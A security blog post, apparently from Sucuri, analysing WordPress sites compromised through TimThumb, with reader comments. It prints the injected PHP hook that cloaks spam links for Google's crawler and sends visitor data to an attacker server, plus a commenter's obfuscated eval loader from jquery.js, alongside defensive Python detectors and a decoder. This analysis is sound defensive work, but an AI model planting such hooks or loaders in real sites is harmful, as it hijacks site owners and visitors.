TimThumb.php Attacks – Now Being Used for Blackhat Spam SEO and Might Break Your Site

We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating that script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.

What we are seeing now is sites getting compromised to load links for blackhat SEO purposes. They have their wp-settings.php modified with the following code:

function google_bot() {
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
    // Only acts on requests whose User-Agent contains "google" (crawler cloaking)
    if (!(strpos($sUserAgent, 'google') === false)) {
        if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) {
            // The attacker's URL was stripped from this post; the visitor IP,
            // host name and referer are appended to it as query parameters
            $ch = curl_init(/* attacker URL removed */ '' . $_SERVER['REMOTE_ADDR'] . '&host=' . $_SERVER['HTTP_HOST'] . /* parameter name removed */ '' . $_SERVER['HTTP_REFERER']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 10);
            $re = curl_exec($ch);
            curl_close($ch);
            echo $re; // whatever the remote server returned is printed into the page
        }
    }
}
add_action('wp_footer', "google_bot"); // hooked into the footer of every page

What this code does is very simple. It connects to a remote server controlled by the attackers to get a few links, which are then added to the bottom of your site. Links like:

 <a href="http://albertasportswear.com /wp-content/uploads/sweaters/sweater_tights&#46html" alt="Sweater Tights" title="Sweater Tights">Sweater Tights</a>
 dilbert sweater vest comic
 <br>knitting softwares
 the knitting room fond du lac
 <a href="http://bettyoctopus.com /wp-content/uploads/knitting/knitting_instructions&#46html" alt="Knitting Instructions" title="Knitting Instructions">Knitting Instructions</a>
 knitting little luxuries louisa harding

It’s very dynamic, always changing. So in addition to having malware and infecting your users, you could be helping the attackers with page rank as well.

What is interesting is that on some sites the attackers are not only infecting the file but are doing it sloppily, leaving extra lines at the bottom of wp-settings.php, which makes the site fail with this error:

Warning: Cannot modify header information – headers already sent by (output started at /home/site/public_html/wp-settings.php:310) in /home1/site/public_html/wp-includes/pluggable.php on line 890

So if you see this warning (headers already sent by (output started at /home/site/public_html/wp-settings.php:310)) on your site, you are likely compromised as well.
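As an added example, not code from this post or from Sucuri: a small Python script a site owner could run over the PHP files of an install to look for the two things described above, the crawler-only footer hook that echoes remotely fetched content, and stray output after the closing ?> tag that produces the "headers already sent" warning. The sample file contents are constructed here (the attacker's URL is a placeholder), and the indicator names and the "three of four" threshold are my own choices, not anything the post specifies.

```python
import re

# Constructed sample inputs (not from any real site): the tail of a clean
# wp-settings.php, and the same file with the footer hook quoted in the
# post appended, closed with "?>" and followed by two stray blank lines.
# The attacker's URL is replaced by a placeholder.
CLEAN_PHP = "<?php\n// ... WordPress bootstrap ...\ndo_action('wp_loaded');\n"

INFECTED_PHP = (
    "<?php\n// ... WordPress bootstrap ...\ndo_action('wp_loaded');\n"
    "function google_bot() {$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);"
    "if(!(strpos($sUserAgent, 'google') === false)) {"
    "if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){"
    "$ch = curl_init('http://ATTACKER-URL-PLACEHOLDER/?ip='.$_SERVER['REMOTE_ADDR']"
    ".'&host='.$_SERVER['HTTP_HOST'].'&ref='.$_SERVER['HTTP_REFERER']);"
    "curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_TIMEOUT, 10);"
    "$re = curl_exec($ch);curl_close($ch);echo $re;}}}"
    "add_action('wp_footer', \"google_bot\");\n"
    "?>\n"
    "\n\n"
)

# Each indicator on its own is common in legitimate code; the combination
# (crawler-only branch + remote fetch + echo of the response + footer hook)
# is the cloaking pattern described in the post.
INDICATORS = {
    # User-Agent is inspected and compared against "google" a short distance later
    "ua_cloaking": re.compile(r"HTTP_USER_AGENT.{0,200}?['\"]google['\"]", re.I | re.S),
    "remote_fetch": re.compile(r"\bcurl_exec\s*\(|file_get_contents\s*\(\s*['\"]https?://", re.I),
    # the curl_exec result is echoed straight into the page
    "echo_remote": re.compile(r"\$(\w+)\s*=\s*curl_exec\b.*?\becho\s+\$\1\b", re.S),
    "footer_hook": re.compile(r"add_action\s*\(\s*['\"]wp_footer['\"]", re.I),
}


def cloaking_indicators(php_src):
    """Names of the indicators present in one PHP source file, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(php_src))


def is_footer_cloaking(php_src):
    """True when at least three of the four indicators occur together (my threshold)."""
    return len(cloaking_indicators(php_src)) >= 3


def stray_output(php_src):
    """Locate bytes PHP would emit before any header is sent: anything ahead
    of the first '<?php' and anything after the last '?>' (PHP swallows
    exactly one newline directly after '?>'). Returns (kind, line_no) pairs."""
    findings = []
    if php_src.find("<?php") != 0:
        findings.append(("before_open_tag", 1))
    close_at = php_src.rfind("?>")
    if close_at != -1:
        tail_start = close_at + 2
        if php_src.startswith("\r\n", tail_start):
            tail_start += 2
        elif php_src.startswith("\n", tail_start):
            tail_start += 1
        if php_src[tail_start:]:
            findings.append(("after_close_tag", php_src.count("\n", 0, tail_start) + 1))
    return findings


if __name__ == "__main__":
    for label, src in (("clean", CLEAN_PHP), ("infected", INFECTED_PHP)):
        print(label, cloaking_indicators(src), stray_output(src))
```

Run it against every .php file under the web root (wp-settings.php, wp-config.php, theme functions.php and so on); a hit on stray_output explains a "headers already sent" warning even when the hook itself has been cleaned, and the line number it returns is the one that warning points at.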

You can check your site here to see if it has this issue: Sucuri SiteCheck

If you need help cleaning up, sign up here: http://sucuri.net/signup

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • http://www.luisramalho.com Luís Ramalho

    The question now is to find how they did this after all the TimThumb related stuff were removed.

    • David Dede

       Probably a backdoor that wasn’t removed?

      • http://www.luisramalho.com Luís Ramalho

        Yes, in fact that is what makes more sense, but they must be hiding it really well. Were you able to detect any other backdoors besides the one described earlier?

  • vipervin

    Just noticed all my WP installation were hit with this same malware.  I thought I had everything fixed and updated.  Anyone have an idea where the backdoor may be?

  • http://www.sparringmind.com Gregory Ciotti

    Will the Sucuri scanner pick this up and email users registered to your service?

  • Meredith

    I found that in one of my sites that had come through your scanner as clean.  Just a few minutes ago.  Thanks for keeping up the great information on this.

  • Pido

    Not sure if this came in through Timthumb. I updated the script on my wp site and chmoded it to 644 already several days ago. Then my a/v set off an alarm today when I surfed to my site.

    Your site scanner didn’t detect it (yet) but I decided to check all the files on my site anyway.

    Found this at the end of  jquery.js and all the jquery.minXXX.js files. Plus, all the files and folders on my site had been chmodded to 777!

    var lK0LEmv=3243408; var ofa5OVnde=9709687; var xDlN28CbW=42025; var sIAF695=371784; var vww = new Array(13282956, 13282971, 13282964, 13282953, 13282970, 13282959, 13282965, 13282964, 13282886, 13282931, 13282951, 13282961, 13282955, 13282924, 13282968, 13282951, 13282963, 13282955, …
    13282913, 13282979);GPifTs = "";for (xIZFe = 0; xIZFe < vww.length; xIZFe ++) { GPifTs = GPifTs + String.fromCharCode(vww[xIZFe]-sIAF695+xDlN28CbW-ofa5OVnde-lK0LEmv); }; eval(GPifTs);

    • David Dede

      The scanner should have detected this one… Can you send us the full content of the file?
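The snippet Pido quoted is a typical String.fromCharCode loader: four random-looking constants, an array of large integers, and a loop that combines the constants with each value before eval'ing the result. The following Python is an added example, not code from the post or from Sucuri, that recovers the hidden string statically (nothing is evaluated) by reading the constants and the arithmetic out of the script itself. The sample input is constructed from the values visible in the comment, with the part the commenter left out marked "...", and the decoder handles any loader of the same shape, whatever the variable names and constants are.

```python
import re

# Constructed sample (not taken from any real site): the beginning and the
# last two values of the array quoted in the comment above, with the gap the
# commenter left marked "..." and the original variable names kept so the
# decoder is driven by the same arithmetic expression.
SAMPLE_JS = (
    "var lK0LEmv=3243408; var ofa5OVnde=9709687; var xDlN28CbW=42025; "
    "var sIAF695=371784; var vww = new Array(13282956, 13282971, 13282964, "
    "13282953, 13282970, 13282959, 13282965, 13282964, 13282886, 13282931, "
    "13282951, 13282961, 13282955, 13282924, 13282968, 13282951, 13282963, "
    "13282955, ... 13282913, 13282979);GPifTs = \"\";"
    "for (xIZFe = 0; xIZFe < vww.length; xIZFe ++) { GPifTs = GPifTs + "
    "String.fromCharCode(vww[xIZFe]-sIAF695+xDlN28CbW-ofa5OVnde-lK0LEmv); }; "
    "eval(GPifTs);"
)


def looks_like_charcode_loader(js):
    """Cheap triage: a numeric array fed to String.fromCharCode and then eval'd."""
    return bool(re.search(r"new\s+Array\(\s*\d", js)
                and re.search(r"String\.fromCharCode\s*\(", js)
                and re.search(r"\beval\s*\(", js))


def extract_constants(js):
    """All `var NAME = INTEGER;` declarations (the per-sample key material)."""
    return {n: int(v) for n, v in re.findall(r"var\s+(\w+)\s*=\s*(\d+)\s*;", js)}


def extract_array(js):
    """The integer payload; non-numeric tokens such as the commenter's '...' are skipped."""
    m = re.search(r"new\s+Array\(([^)]*)\)", js)
    if m is None:
        raise ValueError("no numeric array found")
    return [int(t) for t in re.findall(r"\d+", m.group(1))]


def extract_offset(js, consts):
    """Fold `vww[i] - a + b - c - d` inside fromCharCode(...) into one integer."""
    m = re.search(r"fromCharCode\(\s*\w+\[\w+\]([^)]*)\)", js)
    if m is None:
        raise ValueError("no fromCharCode arithmetic found")
    offset = 0
    for sign, name in re.findall(r"([+-])\s*([A-Za-z_]\w*)", m.group(1)):
        offset += consts[name] if sign == "+" else -consts[name]
    return offset


def decode_charcode_blob(js):
    """Recover the string the loader would eval, without evaluating anything."""
    consts = extract_constants(js)
    offset = extract_offset(js, consts)
    return "".join(chr(v + offset) for v in extract_array(js))


if __name__ == "__main__":
    print(looks_like_charcode_loader(SAMPLE_JS), decode_charcode_blob(SAMPLE_JS))
```

On the values visible in the comment the four constants fold to a single offset of -13282854, and the first eighteen array entries decode to "function MakeFrame", a name that suggests the payload builds a frame; the last two decode to ";}". Feeding the complete tail of the infected jquery.js file through the same function yields the whole injected script, which can then be read rather than run.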

  • Florin

    is http://sitecheck.sucuri.net/ down?

  • Sean

    I have a site with custom posts where half of them seemed to vanish, and the only possible culprit we have been able to come up with is this TimThumb hack.

    Has anyone seen this TimThumb issue cause posts to disappear?


  • http://www.facebook.com/salaslety Letys Salas

    YOUR SCAN DOESN'T WORK.. It shows my site OK but it has the Warning Link at my bottom! Please help with data. What can I do from my cPanel? …. Suggestions? Tks !!
